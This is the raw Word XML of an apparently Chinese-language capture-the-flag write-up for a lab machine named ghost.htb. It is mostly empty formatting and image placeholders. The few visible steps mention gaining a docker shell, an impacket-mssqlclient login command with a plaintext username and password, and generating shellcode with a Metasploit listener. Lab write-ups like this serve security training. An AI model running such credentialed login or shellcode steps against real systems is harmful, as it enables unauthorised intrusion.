    <w:p w14:paraId="39FB59E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拿到docker-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51B7D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去/目录看看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC2F1CD"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4184015"/>
            <wp:effectExtent l="0" t="0" r="1905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D6CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C0D1AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="317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58E1C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C821FCF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F908739">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177F6F01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D387FCE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4811EC8A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A69DBE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114D8233">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2AECED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342E7B7C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CB1A5F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA475E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7013065C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBFFDB9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3419424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impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE560C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D209443">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="2540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BAFD8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0448087B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074D1432">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28EBA294">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="2805430"/>
            <wp:effectExtent l="0" t="0" r="10160" b="127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67C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291DF16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生产shellcode，msf监听</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="14083FCB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8982F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAE9389">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F22F64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MxZTgzNWM1NWFjNjU2NTY1OTdjZTNiYmJlOWY0Y2UifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="41A05511"/>
    <w:rsid w:val="7B8C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284</Words>
  <Characters>1737</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>118</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1969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2024-10-07T13:25:00Z</dcterms:created>
  <dc:creator>lihuijie</dc:creator>
  <cp:lastModifiedBy>WPS_1602334810</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-26T01:27:54Z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5904EC8F6BDD4EBD9DDB0A77EEF8E75B_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNjFjYmM4ODNlMGYzNzE0ZWU5YzYyMzdiZGI1MjRlNjMiLCJ1c2VySWQiOiIxMTI5NjM0NTg5In0=</vt:lpwstr>
  </property>
</Properties>
</file>